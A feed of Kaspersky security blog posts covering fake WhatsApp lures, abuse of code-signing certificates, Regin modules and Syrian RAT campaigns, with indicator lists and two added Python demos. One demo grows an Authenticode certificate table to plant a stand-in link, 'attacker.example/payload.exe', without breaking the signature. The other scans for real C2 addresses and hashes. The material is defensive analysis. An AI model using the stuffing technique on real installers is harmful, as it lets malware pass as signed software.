Secure List feed for B2B

Online headquarters of Kaspersky Lab security experts.

WhatsApp for Web in the sight of cybercriminals

Mon, 02/02/2015 - 08:40

There is no doubt WhatsApp is among the most popular mobile IMs nowadays – its 700 million users worldwide were eagerly awaiting this week's promised desktop version. However, it wasn't just users who were waiting – cybercriminals were quick to start using this new feature in their attacks, aiming to spread malware and infect users.

In fact we had been seeing malicious messages about a supposed desktop WhatsApp long before the app actually added that platform to its repertoire. Fake downloads appeared in several languages and countries, and now that there is a real product out there, the fraudsters have returned to their old attacks, dressed them up in new clothes and sent them on the prowl for new victims. In Brazil, for example, we soon saw messages like this:

"WhatsApp for your PC" is now real, but this link is malware

We found several malicious domains registered for use in these attacks. Some were already in use and others were awaiting their owners' command, such as whatsappcdesktop.com.br, which was spreading Brazilian banking Trojans (b93417abdc82cf79d79b737b61744353 and 9f485efea5c20b821e9522e3b4aa0e11):

However, other bad guys decided to prepare a nice design and ask users to install a suspicious Chrome extension that had nothing to do with WhatsApp:

You do not need a Chrome extension to use WhatsApp Web…

There are also some unofficial desktop versions of WhatsApp circulating among speakers of Arabic and Spanish. Here a website offers a version of "WhatsApp Plus" for installation:

And here is "WhatsApp Spy", targeting Spanish-speaking countries:

To download the supposed desktop version you have to enter your mobile number:

Why do they ask for your number? To subscribe you to premium services that cost money, and to send you spam. Yes, spam. One thing is certain: all these web services aim to harvest your mobile number easily and feed the long-established spam industry that already uses WhatsApp. As pointed out by Adaptive Mobile, the number of these spam messages increases day by day. WhatsApp processes around 30 billion messages per day, and not surprisingly many of them are spam:

Mobile Spam, now on your instant message

It's not difficult to find Brazilian spammers who are already doing this, masquerading as 'marketing companies' and selling packages to distribute spam. Their services don't just include text; there's also the option of spreading pictures, audio or even video for the low price of $0.03 per message, including an admin panel and an API:

US$75 for 5k credits, which corresponds to 5,000 spam messages

Unfortunately, it is not possible to block messages from unknown contacts on WhatsApp; all you can do is block the sender after the message has arrived, which does not solve the problem at all. In all cases keep in mind that the real WhatsApp web service is located at https://web.whatsapp.com, so please refuse imitations and suspicious apps.

Why You Shouldn't Completely Trust Files Signed with Digital Certificates

Thu, 01/29/2015 - 06:00

A digital signature on a file is commonly taken as a token of its safety. For users, a digital certificate is an indication that the file does not contain malicious code. Many system administrators build their corporate security policies around allowing users to launch only those files that are signed with a digital certificate. In addition, some antivirus scanners automatically consider a file to be safe if it is signed with a valid digital certificate.

However, users' absolute trust in signed files encourages cybercriminals to look for ways to get their malicious files signed with the same trusted certificates, so that they can use them in their criminal schemes.

This article looks into the main threats associated with signed files, and suggests practical methods of mitigating the risks associated with launching them.

Creating digital signatures for files

Before we explore the threats associated with using digital certificates, let us first look into the process when a file is signed with a digital certificate:

  1. The software developer compiles the file.
  2. A hash (MD5, SHA-1 or SHA-2) of the file is calculated.
  3. That hash is signed with the software developer's private key (for RSA this is often described as encrypting the hash).
  4. The resulting signature block and the digital certificate are appended to the end of the file.

The digital certificate contains the software developer's public key, which can be used to verify the signature, recover the signed hash and thus check the file's integrity. It also contains information with which the developer's identity can be checked.

The authenticity of the file's publisher is confirmed with the help of a Certification Authority (CA). This entity certifies to other users that the public key which verifies the signed hash does indeed belong to the developer in question. To do so, the CA signs the developer's certificate and thus testifies that the unique public/private key pair belongs to that particular developer. The CA's own certificate (the chain up to the root) is also added to the end of the file alongside the developer's certificate, so that the whole chain can be checked.

Root CA certificates are self-signed: nobody verifies them other than the CAs themselves. For Windows to trust the certificates issued by a certain CA, that CA's root certificate must be present in the operating system's certificate store. The root certificates of the most authoritative CAs have undergone an audit and are included in the store automatically, delivered to users along with Windows updates. Certificates of other CAs can be added to the store at the user's discretion.

The use of trusted certificates by cybercriminals

Now let's look at attacks that can be carried out at each stage of signing a file. We are not interested in theoretical attacks based on the weaknesses of the encryption algorithms used to sign the file, but will concentrate instead on the attack methods most often used by cybercriminals in practice.

Planting malicious code at the file compilation stage

In many large software companies, files are signed automatically as soon as compilation is complete. Compilation is done centrally on a dedicated build server.

If cybercriminals gain access to a software manufacturer's corporate network, they can use the corporate build server to compile a malicious file, so that it automatically gets signed with the company's certificate. As a result of this attack, the cybercriminals obtain a malicious file carrying a valid digital signature.

In practice this type of attack is quite rare because large software manufacturers have adequate security in place to protect their build servers. Nevertheless, there have been cases in which targeted attacks succeeded and malicious files were signed with a trusted company's certificate.

Stealing a private key

Sometimes cybercriminals succeed in penetrating a corporate network and gaining access to the private key used to sign files. With that key, they can sign any malicious file and pass it off as a file produced by a legitimate software manufacturer.

One way to steal a private key is to use specialized malware created specifically for this purpose.

After stealing a private key, the cybercriminal either uses it or sells it to someone else to use. The more famous the software manufacturer from which the key was stolen, the more valuable the key will be among cybercriminals. Software from well-known manufacturers does not attract any suspicion from users and security administrators on corporate networks.

At the same time, large software manufacturers keep their private keys in dedicated, well-protected hardware modules, which makes them much more difficult to steal. As a result, private keys are typically stolen from smaller companies or individual software developers who do not pay enough attention to security.

Vulnerabilities in the algorithms that check executable file signatures

For the operating system to know which part of the file contains the digital signature, the header of each signed executable includes an 8-byte data directory entry (IMAGE_DIRECTORY_ENTRY_SECURITY) that records the file offset and the size of the certificate table. These 8 bytes are excluded from the hash when the signature is checked, and so is the certificate table itself. If a block of data is appended to the end of the certificate table and the size recorded in that entry is increased accordingly, the changes have no effect on the outcome of the signature check. This makes it possible to gain extra space in a signed file where data can be added without invalidating the signature.

This trick is actively used in legitimate web installers: the developers enlarge the signature block to make room for an additional block of data, so that the certificate table includes a link to the file the installer should download from the developer's site and install on the user's system. This is convenient for the developer because the installer does not have to be re-signed each time the download link changes: it is enough to change the link stored in the signature block.

Cybercriminals can use the same trick for their own purposes. A cybercriminal takes the web installer of a legitimate program and changes the link so that a different distribution kit is downloaded. The installer then downloads and installs malware on the user's system, and the criminal uploads the modified, still validly signed installer to software distribution sites.

To fix this, Microsoft released security update MS13-098, which adds a stricter check of the certificate table. The stricter check is not enabled by default, because many software developers rely on the technique above and their installers would be considered unsigned if it were enforced everywhere. Users and administrators can enable it manually (via the EnableCertPaddingCheck registry value described in Microsoft's security advisory).
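To make the mechanism concrete, here is an added example (it is not part of the original article, nor Microsoft's or any signing tool's code). It constructs a minimal, non-loadable PE32 file, attaches a certificate table holding a constructed DER placeholder instead of a real PKCS#7 signature, then implements a simplified version of the Authenticode hashing rule: the CheckSum field, the 8-byte security directory entry and the certificate table are excluded from the digest. It shows that appending data to the certificate table (the web-installer trick) leaves the Authenticode hash unchanged even though the plain file hash changes, and it models the stricter MS13-098 rule that rejects non-zero bytes after the end of the PKCS#7 structure. The download URL and all sample bytes are invented for the demonstration; real Authenticode additionally walks section data in raw-offset order, which this stand-in omits because the constructed file has no sections.

```python
import hashlib
import struct

# Field positions in a PE32 file (IMAGE_OPTIONAL_HEADER32 and the data directory array that follows it)
OPT_CHECKSUM_OFF = 64      # DWORD CheckSum, excluded from the Authenticode hash
OPT_DATADIR_OFF = 96       # start of the IMAGE_DATA_DIRECTORY array
SECURITY_DIR_INDEX = 4     # IMAGE_DIRECTORY_ENTRY_SECURITY: the 8 bytes (offset, size) discussed in the text
WIN_CERT_HEADER_LEN = 8    # WIN_CERTIFICATE header: dwLength, wRevision, wCertificateType

# Constructed placeholder standing in for a PKCS#7 SignedData blob: a DER SEQUENCE that holds only the
# signedData OID (1.2.840.113549.1.7.2). It is not a signature, just something with a DER length to parse.
FAKE_PKCS7 = bytes.fromhex("300b06092a864886f70d010702")
# Hypothetical link a criminal might plant in the certificate table (constructed, not from the article).
FAKE_DOWNLOAD_URL = b"https://attacker.example/payload.exe\x00"


def _opt_header_off(pe: bytes) -> int:
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    return e_lfanew + 4 + 20                      # skip "PE\0\0" and the 20-byte COFF header


def _security_dir_off(pe: bytes) -> int:
    return _opt_header_off(pe) + OPT_DATADIR_OFF + SECURITY_DIR_INDEX * 8


def security_dir(pe: bytes):
    """(file offset, size) of the certificate table, read from the security data directory entry."""
    return struct.unpack_from("<II", pe, _security_dir_off(pe))


def build_minimal_pe() -> bytearray:
    """Constructed stand-in for an executable: DOS header, PE32 headers with zero sections, padded to 512 bytes.
    It is not loadable; it only carries the fields the Authenticode hashing rules look at."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)        # i386, 0 sections, 224-byte optional hdr
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                  # Magic: PE32
    struct.pack_into("<I", opt, 92, 16)                                    # NumberOfRvaAndSizes
    pe = bytearray(dos + b"PE\x00\x00" + coff + opt)
    pe += b"\x00" * (0x200 - len(pe))                                      # stands in for section data
    return pe


def authenticode_hash(pe: bytes, algo: str = "sha256") -> str:
    """Simplified Authenticode digest: hash everything except the CheckSum field, the security directory
    entry and the certificate table itself."""
    opt = _opt_header_off(pe)
    skip = [(opt + OPT_CHECKSUM_OFF, 4), (_security_dir_off(pe), 8)]
    cert_off, cert_size = security_dir(pe)
    if cert_size:
        skip.append((cert_off, cert_size))
    h, pos = hashlib.new(algo), 0
    for start, length in sorted(skip):
        h.update(pe[pos:start])
        pos = start + length
    h.update(pe[pos:])
    return h.hexdigest()


def attach_cert_table(pe: bytes, pkcs7: bytes) -> bytearray:
    """Append a WIN_CERTIFICATE (revision 2.0, type PKCS_SIGNED_DATA), zero-padded to 8-byte alignment,
    and point the security directory at it. This is where a signing tool stores the signature."""
    out = bytearray(pe)
    cert_off = len(out)
    body = bytearray(struct.pack("<IHH", 0, 0x0200, 0x0002) + pkcs7)
    body += b"\x00" * (-len(body) % 8)
    struct.pack_into("<I", body, 0, len(body))                             # dwLength: header + blob + padding
    out += body
    struct.pack_into("<II", out, _security_dir_off(out), cert_off, len(body))
    return out


def stuff_cert_table(pe: bytes, extra: bytes) -> bytearray:
    """The web-installer trick from the text: grow the certificate table by `extra` bytes and bump both
    dwLength and the directory size. The signature bytes are untouched, so the Authenticode hash is too."""
    out = bytearray(pe)
    cert_off, cert_size = security_dir(out)
    if cert_off + cert_size != len(out):
        raise ValueError("certificate table must be the trailing data")
    out += extra
    new_size = cert_size + len(extra)
    struct.pack_into("<I", out, cert_off, new_size)
    struct.pack_into("<II", out, _security_dir_off(out), cert_off, new_size)
    return out


def der_total_length(blob: bytes) -> int:
    """Size of the outermost DER element (tag + length + contents), i.e. where the PKCS#7 structure ends."""
    first = blob[1]
    if first < 0x80:
        return 2 + first
    n = first & 0x7F
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def strict_padding_check(pe: bytes) -> bool:
    """Model of the stricter rule MS13-098 lets you opt into: bytes after the PKCS#7 body inside the
    certificate table may only be zero padding, otherwise the signature is treated as invalid."""
    cert_off, cert_size = security_dir(pe)
    blob = pe[cert_off + WIN_CERT_HEADER_LEN:cert_off + cert_size]
    return all(b == 0 for b in blob[der_total_length(blob):])


if __name__ == "__main__":
    signed = attach_cert_table(build_minimal_pe(), FAKE_PKCS7)
    stuffed = stuff_cert_table(signed, FAKE_DOWNLOAD_URL)
    print("same Authenticode hash:", authenticode_hash(signed) == authenticode_hash(stuffed))
    print("same plain file hash:  ", hashlib.sha256(signed).digest() == hashlib.sha256(stuffed).digest())
    print("strict check, signed: ", strict_padding_check(signed))
    print("strict check, stuffed:", strict_padding_check(stuffed))
```

The two hash functions illustrate why the trick works against signature verification but not against reputation or antivirus databases: the Authenticode digest is identical for the original and the stuffed installer, while the hash of the file as stored on disk changes. Flipping a byte in the section area, by contrast, changes the Authenticode digest and breaks the signature, which is exactly the property the padding abuse sidesteps.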

The use of legally obtained certificates

A few years ago, digital certificates were actively used by large software manufacturers that were legally registered companies. Today, certificates are used increasingly often by individual software developers and small companies. The graph below shows how the number of certificates with which to sign software code known to Kaspersky Lab changed over time. As can be seen, the number of certificates is steadily growing year on year.

The number of certificates verified by CAs and known to Kaspersky Lab

The procedure for purchasing a code-signing certificate is quite simple: individuals must present their passport details, and companies their registration details. Some CAs make no further checks into the activities of the companies seeking the certificate. All the CA does is issue a certificate entitling the client to sign executable files, and confirm that the certificate has indeed been issued to that specific person or company.

This enables cybercriminals to legally purchase a certificate to sign their malicious and/or potentially unwanted software.

Companies producing potentially unwanted software are the most frequent purchasers of certificates. On the one hand, these companies do not produce malware, so they can legally purchase a digital certificate to sign their software. On the other hand, they produce software that annoys users. In fact, they get their software signed precisely to encourage users to trust it.

Untrusted certificates

In all cases described above, be it stealing a private key, compromising a company's infrastructure and signing a file with that company's digital certificate, or purchasing a certificate with the intent of signing malware with it, the end result is the same: a trusted certificate is used to sign a malicious file.

Therefore, these certificates cannot be considered trusted in spite of the fact that their authenticity has been verified by a CA, as they were (or continue to be) used to sign malicious files. We will hereafter describe these certificates as 'untrusted'.

If a private key is stolen from a software developer, or a company's infrastructure is compromised and a trusted certificate is used to sign a malicious file, the CA stops vouching for the certificate it issued earlier (the certificate is revoked). How quickly the CA reacts depends on how soon it becomes known that the certificate has been used by somebody other than the legitimate developer.

However, when a certificate was purchased to sign potentially unwanted software, CAs do not always revoke it. As a result the certificate can remain valid and continue to be used to sign potentially dangerous software.

The following chart shows the proportions of untrusted certificates used to sign malware and potentially unwanted software (Kaspersky Lab data).

Breakdown of untrusted certificate numbers by their type

Methods of protection against launching software programs signed with untrusted certificates

We have discussed the most popular techniques cybercriminals use to get files signed with digital certificates. Recently we have seen the problem of malicious and potentially unwanted files signed with digital certificates grow considerably. In 2008, 1,500 certificates were later used to sign malware; in 2014 there were more than 6,000 such cases.

The number of untrusted certificates known to Kaspersky Lab

Given the growing number of threats associated with malicious files signed with digital certificates, users and administrators can no longer risk placing blind faith in signed files and allowing them to be launched simply because they carry a digital signature.

Here are a few practical tips to reduce your chances of launching a new malware program that has a valid digital certificate and hasn't yet reached your anti-virus databases:

  1. Only allow the launch of software programs signed by a reputable manufacturer.

     You can substantially reduce the risk of infection by blocking the launch of all software signed with digital certificates belonging to unknown software manufacturers. As described above, certificates are most often stolen from smaller software companies.

  2. Only allow programs to be launched after they are identified by their unique digital signature attributes.

     Several certificates issued to the same company may carry the same subject name. If one of them is stolen from a reputable company, a check that automatically trusts well-known publishers would let a file signed with the stolen certificate through.

     To prevent this, check other attributes as well as the certificate name before allowing programs signed with known certificates to launch. These attributes might be the serial number or the certificate fingerprint (thumbprint, i.e. the hash of the certificate). Serial numbers are only unique among the certificates issued by a single CA, so we recommend checking the serial number together with the CA that issued the certificate.

  3. Activate the MS13-098 security update.

     For experienced users and system administrators, it is advisable to enable the stricter check introduced by update MS13-098: it fixes an error which allows additional data to be included in a signed file without invalidating the file's signature. Details on how to enable it are published by the Microsoft Security Center.

  4. Do not install certificates from unknown CAs into your certificate store.

     It is not a good idea to install root certificates from unknown CAs. If you do so, any file signed with a certificate issued by that CA will subsequently be considered trusted.

  5. Use a trusted certificates database from a security software manufacturer.

     Some security software manufacturers, including Kaspersky Lab, include a database of trusted and untrusted certificates in their products; this database is updated regularly along with the anti-virus databases. With it, you receive prompt updates about not-yet-revoked certificates that have been used to sign malware and/or potentially unwanted software. Files signed with untrusted certificates from this database receive enhanced monitoring by the security product.

     The database of trusted certificates includes certificates from reputable software publishers that have been used to sign trusted software programs. If a certificate is listed in this database, it is a strong indicator that corporate application control can allow the application to launch.

     A database of this kind included in a security product makes the administrator's job easier, sparing them the need to create and maintain an in-house database of trusted certificates.

The number of digital certificates used to sign malware and/or potentially unwanted software is doubling every year on average. That is why it is vital that companies exercise ever greater control over signed files with the help of security product tools, and follow the above security policies.

Comparing the Regin module 50251 and the "Qwerty" keylogger

Tue, 01/27/2015 - 07:00

On January 17 2015, Spiegel.de published an extensive article based on documents obtained from Edward Snowden. At the same time, they provided a copy of a malicious program codenamed "QWERTY" (http://www.spiegel.de/media/media-35668.pdf), supposedly used by several governments in their CNE (computer network exploitation) operations.

We've obtained a copy of the malicious files published by Der Spiegel and when we analyzed them, they immediately reminded us of Regin. Looking at the code closely, we conclude that the "QWERTY" malware is identical in functionality to the Regin 50251 plugin.

Analysis

The Qwerty module pack consists of three binaries and accompanying configuration files. One file from the package, 20123.sys, is particularly interesting.

20123.sys is the kernel-mode part of the keylogger. As it turns out, it was built from source code that can also be found in one Regin module, the 50251 plugin.

Using a binary diff it is easy to spot a significant part of code that is shared between both files:

Most of the shared code belongs to the function that accesses the system keyboard driver:

Most of the Qwerty components call plugins from the same pack (plugin numbers 20121 to 20123); however, there is also one piece of code that references plugins from the Regin platform. One particular part of the code is present in both the Qwerty 20123 module and its Regin 50251 counterpart, and it addresses plugin 50225, which can be found in Regin's virtual filesystems. Regin's plugin 50225 is responsible for kernel-mode hooking.

This is solid proof that the Qwerty plugin can only operate as part of the Regin platform, leveraging the kernel hooking functions from plugin 50225.

As additional proof that both modules use the same software platform, we can look at the functions exported by ordinal 1 in both modules. They contain the startup code found in every other Regin plugin, including the actual plugin number that is registered with the platform so that the module can be addressed later. This only makes sense if the modules are used with the Regin platform orchestrator.

The reason why the two modules have different plugin IDs is unknown. This is perhaps because they are leveraged by different actors, each one with its own allocated plugin ID ranges.

Conclusions

Our analysis of the QWERTY malware published by Der Spiegel indicates it is a plugin designed to work as part of the Regin platform. The QWERTY keylogger does not function as a stand-alone module; it relies on kernel hooking functions provided by the Regin module 50225. Considering the extreme complexity of the Regin platform and the small chance that it could be duplicated by somebody without access to its source code, we conclude that the QWERTY malware developers and the Regin developers are the same or working together.

Another important observation is that Regin plugins are stored inside an encrypted and compressed VFS, meaning they do not exist on the victim's machine in "native" format. The platform dispatcher loads and executes these plugins at startup. The only way to catch the keylogger is by scanning the system memory or decoding the VFSes.


Appendix (MD5 hashes):

QWERTY 20123.sys:

0ed11a73694999bc45d18b4189f41ac2


Regin 50251 plugins:

c0de81512a08bdf2ec18cb93b43bdc2d
e9a43ea2882ac63b7bc036d954c79aa1

The Syrian malware part 2: Who is The Joe?

Tue, 01/27/2015 - 04:00
Introduction

Kaspersky Lab would like to alert users in the Middle East to new malware attacks being delivered through Syrian news and social networking forums. The malware writers use multiple techniques to deliver their files and entice victims to run them, creating an effective infection vector. Relying mainly on social engineering, the attackers exploit victims' trust in social networking forums, their curiosity about news related to the conflict in Syria, their situation in Syria, and their lack of cyber security awareness. Once a victim's computer is infected, the attackers have full access to and control over the victim's devices.

In the first report on Syrian malware, Kaspersky Lab detailed many attacks being used in Syria to spy on users; the report included attacks from different teams and many sources.

This post follows up on one of the domains, apparently the most active one recently: thejoe.publicvm.com

The malware files were found on activist sites and social networking forums, some others were reported by regional organisations like CyberArabs.

Reports that mention "the Joe"
https://citizenlab.org/2013/06/a-call-to-harm/
https://www.eff.org/files/2013/12/28/quantum_of_surveillance4d.pdf

All the files hide under the hood a full-featured variant of a RAT (Remote Administration Trojan: Bifrose, NjRAT, Shadowtech, DarkComet...), capable of taking full control of victims' machines and devices, monitoring any activity and accessing all files. The thejoe.publicvm.com domain is related to many samples; here we focus on the most important and alluring ones, which most probably collected the highest number of victims, estimated in the thousands.

There are many factors and entities at play in this event, we will only focus on the malware and the facts that have been found during the analysis, presenting only relevant information, in the hope of setting a clear context for this research.

What is the information we had on theJoe?
What has the Joe been doing in the last period?
Who is the Joe?

What is the information we had on the Joe?

The Joe is one of the most active cyber criminals in Syria and the Middle East, targeting all types of users. The following is the information collected on The Joe and his activities.

Domain information "thejoe.publicvm.com"

The Joe uses a dynamic DNS domain so that he can change his IP address and maintain anonymity. The domain thejoe.publicvm.com has been seen resolving to the following IP addresses, located in Syria and Russia:

  • 31.9.48.146
  • 31.9.48.119
  • 31.9.48.80
  • 31.9.48.78
  • 31.8.48.7

TCP ports used in the attacks: 1234, 1177, 5522.

Malware information

From the malware samples collected, we were able to find strings in the code, from the Windows device used by the Joe.

Folder paths recovered from the malware files:

  • C:\Users\joe\Desktop\2014\WindowsApplication1\WindowsApplication1\obj\Debug\WindowsApplication1.pdb
  • C:\Users\joe\Desktop\Desktop\Syriatel\Syriatel\obj\Debug\Syriatel.pdb
  • C:\Users\joe\Desktop\NJServer\NJServer\obj\Debug\NJServer.pdb

YouTube channel

The Joe also uses a fake YouTube channel where he posts social engineering videos with links to download malware.

http://www.youtube.com/channel/UCCdoQBw-a6dM15ZyhrsqW_w

The channel distributes malware files under names such as "Lions of the revolution".

What has the Joe been doing in the last period?

The Joe has been busy recently. Below we show some of the most graphic and alluring samples collected by Kaspersky Intelligence Services and the Kaspersky Security Network (KSN cloud), detailing their functionality and how The Joe exploits the situation in Syria to get users to open the files even if they suspect they are infected. The most targeted countries are Syria, Turkey, Lebanon and Saudi Arabia. The number of victims is estimated at around 2,000.

6 new stories:

  1. Let us fix your SSL vulnerability
  2. Now Let us clean your Skype!
  3. Did you update to the latest VPN version?
  4. Let's Check if your phone number is among the monitored numbers
  5. The Facebook account encryption application
  6. What's your favourite security product?

1 - Let us fix your SSL vulnerability

MD5 Hash: dc6166005db7487c9a8b32d938fec846
Filename: TheSSL.exe, SSL Cleaner.rar

Following the OpenSSL vulnerabilities and the amount of news coverage they received, the criminals are trying to profit from users' awareness of the news combined with their lack of understanding of how such vulnerabilities are actually fixed.

Demonstration video on the Heartbleed vulnerability + Link to download the "Fix" with infection



2 - Now Let us clean your Skype!

MD5 Hash: d6ab8ca6406fefe29e91c0604c812ff9
File Name: Skype.exe

Another social engineering trick used to lure victims into downloading and executing a malicious file: a "Skype cleaner" that will supposedly "protect and encrypt your Skype communications".


3 - Did you update to the latest VPN version?

MD5 Hash: 2e07e8622b4e997f6543fc0497452dad
File Name: VPN.exe

Psiphon is a legitimate application used around the world to protect anonymity; it is particularly popular in Syria, where users rely on it to protect their traffic from snooping or interception. Here the application is bundled with malware and delivered to users as an updated version.


4 - Let's Check if your phone number is among the monitored numbers

MD5 Hash: ad9a18e1db0b43cb38da786eb3bf7c00
File Name: Syriatel.exe

Another popular malware file poses as a tool for checking which mobile phone numbers are under surveillance, sorted by location, and is delivered to victims as a "leaked program".



5 - The Facebook account encryption application

MD5 Hash: efdaa73e0ac1b045d5f2214cadd77f09
File Name: Rooms.exe


6 - What's your favourite security product?

One of the latest files used to infect users is quite different: a binding of a Kaspersky Lab tool with malware. Developed by Kaspersky Lab, TDSSKiller is a powerful free tool that can detect and remove a specific list of rootkit malware families.

By bundling TDSSKiller with malware, The Joe is using the Kaspersky name to deliver his malware, in an attempt to get victims to trust and open the files he sends.

Who is "The Joe"?

Hundreds of samples relating to the Syrian malware were analyzed. One of them extracts to multiple documents, and in one of those we found a metadata slip that led to some interesting information.

The metadata left by the person using "Joe" as his nickname revealed his personal email address, which with further research leads to his other email addresses, full identity and social network pages...

On Facebook:

On Linkedin:

Indicators of compromise

MD5 hash | Name(s) used for the malware file | First seen
f62cfd2484ff8c5b1a4751366e914613 | Adobe.exe, Reader.exe, Card.exe | Sept 2013
012f25d09fd53aeeddc11c23902770a7, 89e6ae33b170ee712b47449bbbd84784 | قائمة الأرهاب .zip ("list of terrorism"); the archive extracts to a .JPG and malicious .SCR files | Jan 2014
dc6166005db7487c9a8b32d938fec846, 62023eb959a79bbdecd5aa167b51541f | TheSSL.exe (to "remove SSL weaknesses"), SSL Cleaner.rar | April 2014
cc694b1f8f0cd901f65856e419233044 | Desktop.exe, Empty.exe, Host.exe | Mar 2014
d6ab8ca6406fefe29e91c0604c812ff9 | Skype.exe, Skypecleaner.exe | July 2014
2e07e8622b4e997f6543fc0497452dad | VPN.exe | Sept 2014
efdaa73e0ac1b045d5f2214cadd77f09 | Rooms.exe (to "encrypt your Facebook") | Nov 2014
39d0d7e6880652e58b2d4d6e50ca084c | Photo.exe | Nov 2014
abf3cfecd2e194961fc97dac34f57b24 | Ram.exe, Setup.exe | Nov 2014
a238f8ab946516b6153816c5fb4307be | tdskiler.exe (to "remove malware") | Jan 2015
6379afd35285e16df4cb81803fde382c | Locker.exe (to "encrypt/decrypt" files) | Jan 2015

Kaspersky Lab detects all malicious files used in the attacks.
All files are actively being used by the cybercriminals at the time of this report.
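The indicators above (file hashes, the leaked PDB paths, the dynamic DNS name, the C2 addresses and ports) are enough for a simple triage scanner. The following is an added example, not Kaspersky Lab's tooling: it matches files by MD5 against the table, searches binaries for The Joe's build-path strings and the C2 domain, and flags connection-log entries to the listed addresses. The sample "files" and log lines are constructed for the demonstration and contain no real malware; the log format (`src=ip:port dst=ip:port`) is an assumption, so adapt the regular expression to your own logs.

```python
import hashlib
import ipaddress
import re

# Indicators transcribed from the post's table and lists (this post's own data, nothing new).
THEJOE_MD5 = {
    "f62cfd2484ff8c5b1a4751366e914613": "Adobe.exe / Reader.exe / Card.exe",
    "012f25d09fd53aeeddc11c23902770a7": "list of terrorism .zip",
    "89e6ae33b170ee712b47449bbbd84784": "list of terrorism .zip",
    "dc6166005db7487c9a8b32d938fec846": "TheSSL.exe / SSL Cleaner.rar",
    "62023eb959a79bbdecd5aa167b51541f": "TheSSL.exe / SSL Cleaner.rar",
    "cc694b1f8f0cd901f65856e419233044": "Desktop.exe / Empty.exe / Host.exe",
    "d6ab8ca6406fefe29e91c0604c812ff9": "Skype.exe / Skypecleaner.exe",
    "2e07e8622b4e997f6543fc0497452dad": "VPN.exe",
    "efdaa73e0ac1b045d5f2214cadd77f09": "Rooms.exe",
    "39d0d7e6880652e58b2d4d6e50ca084c": "Photo.exe",
    "abf3cfecd2e194961fc97dac34f57b24": "Ram.exe / Setup.exe",
    "a238f8ab946516b6153816c5fb4307be": "tdskiler.exe",
    "6379afd35285e16df4cb81803fde382c": "Locker.exe",
}
THEJOE_C2_DOMAIN = b"thejoe.publicvm.com"
THEJOE_C2_IPS = {ipaddress.ip_address(a) for a in
                 ("31.9.48.146", "31.9.48.119", "31.9.48.80", "31.9.48.78", "31.8.48.7")}
THEJOE_C2_PORTS = {1234, 1177, 5522}
# The .NET debug paths left in the samples all start with the same user profile; match any project under it.
PDB_PATTERN = re.compile(rb"C:\\Users\\joe\\Desktop\\[\x20-\x7e]*?\.pdb", re.IGNORECASE)
# Assumed log layout; change this for your own connection logs.
LOG_RE = re.compile(r"dst=(?P<ip>[\d.]+):(?P<port>\d+)")


def scan_file_bytes(name: str, data: bytes) -> list:
    """Return human-readable findings for one file: known hash, embedded PDB path, C2 domain string."""
    hits = []
    digest = hashlib.md5(data).hexdigest()
    if digest in THEJOE_MD5:
        hits.append(f"{name}: MD5 {digest} is a known sample ({THEJOE_MD5[digest]})")
    for m in PDB_PATTERN.finditer(data):
        hits.append(f"{name}: embedded PDB path {m.group().decode()}")
    if THEJOE_C2_DOMAIN in data:
        hits.append(f"{name}: references C2 domain {THEJOE_C2_DOMAIN.decode()}")
    return hits


def scan_connection_log(lines) -> list:
    """Flag connections to the listed C2 addresses; a listed port on an unlisted host is weaker evidence."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        try:
            ip = ipaddress.ip_address(m["ip"])
        except ValueError:
            continue
        port = int(m["port"])
        if ip in THEJOE_C2_IPS:
            hits.append(f"C2 connection: {ip}:{port}")
        elif port in THEJOE_C2_PORTS:
            hits.append(f"C2 port only (weak): {ip}:{port}")
    return hits


# Constructed stand-ins, not real samples: a fake binary carrying The Joe's build artefacts, and a clean one.
SAMPLE_FILES = {
    "Syriatel.exe": (b"MZ\x90\x00" + b"\x00" * 32
                     + b"C:\\Users\\joe\\Desktop\\Desktop\\Syriatel\\Syriatel\\obj\\Debug\\Syriatel.pdb\x00"
                     + b"\x00" * 8 + b"thejoe.publicvm.com\x00"),
    "notepad.exe": b"MZ\x90\x00" + b"\x00" * 32 + b"C:\\build\\notepad\\notepad.pdb\x00",
}
# Constructed log lines using documentation address ranges for the benign hosts.
SAMPLE_LOG = [
    "2015-01-20T10:00:01 src=10.0.0.5:49152 dst=31.9.48.146:1177 proto=tcp",
    "2015-01-20T10:00:02 src=10.0.0.5:49153 dst=198.51.100.20:443 proto=tcp",
    "2015-01-20T10:00:03 src=10.0.0.7:49170 dst=192.0.2.10:5522 proto=tcp",
]

if __name__ == "__main__":
    for fname, blob in SAMPLE_FILES.items():
        for hit in scan_file_bytes(fname, blob):
            print(hit)
    for hit in scan_connection_log(SAMPLE_LOG):
        print(hit)
```

Hash matching only catches the exact samples in the table, so the string indicators do the real work against recompiled builds: the PDB path ties a binary to the same developer machine even when the payload changes, and the dynamic DNS name survives IP rotation. The port-only match is deliberately reported as weak, since 1234, 1177 and 5522 are not exclusive to this actor.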

Conclusion

Syrian malware relies heavily on social engineering and on the active development of malicious variants. Nevertheless, most samples quickly reveal their true nature when inspected carefully, and this is one of the main reasons for urging Syrian users to be extra vigilant about what they download and to implement a layered defense. We expect these attacks to evolve in both quality and quantity.

For more details, please contact: intelligence@kaspersky.com

An analysis of Regin's Hopscotch and Legspin

Thu, 01/22/2015 - 05:00

With high profile threats like Regin, mistakes are incredibly rare. However, when it comes to humans writing code, some mistakes are inevitable. Among the most interesting things we observed in the Regin malware operation were the forgotten codenames for some of its modules.

These are:

  • Hopscotch
  • Legspin
  • Willischeck
  • U_STARBUCKS

We decided to analyze two of these modules in more detail - Hopscotch and Legspin.

Despite the overall sophistication (and sometimes even over-engineering) of the Regin platform, these tools are simple, straightforward and provide interactive console interfaces for Regin operators. What makes them interesting is the fact they were developed many years ago and could even have been created before the Regin platform itself.

The Hopscotch module

MD5: 6c34031d7a5fc2b091b623981a8ae61c
Size: 36864 bytes
Type: Win32 EXE
Compiled: 2006.03.22 19:09:29 (GMT)

This module has another binary inside, stored as resource 103:

MD5: 42eaf2ab25c9ead201f25ecbdc96fb60
Size: 18432 bytes
Type: Win32 EXE
Compiled: 2006.03.22 19:09:29 (GMT)

This executable module was designed as a standalone interactive tool for lateral movement. It does not contain any exploits; instead it relies on previously acquired credentials to authenticate to the remote machine using standard APIs.

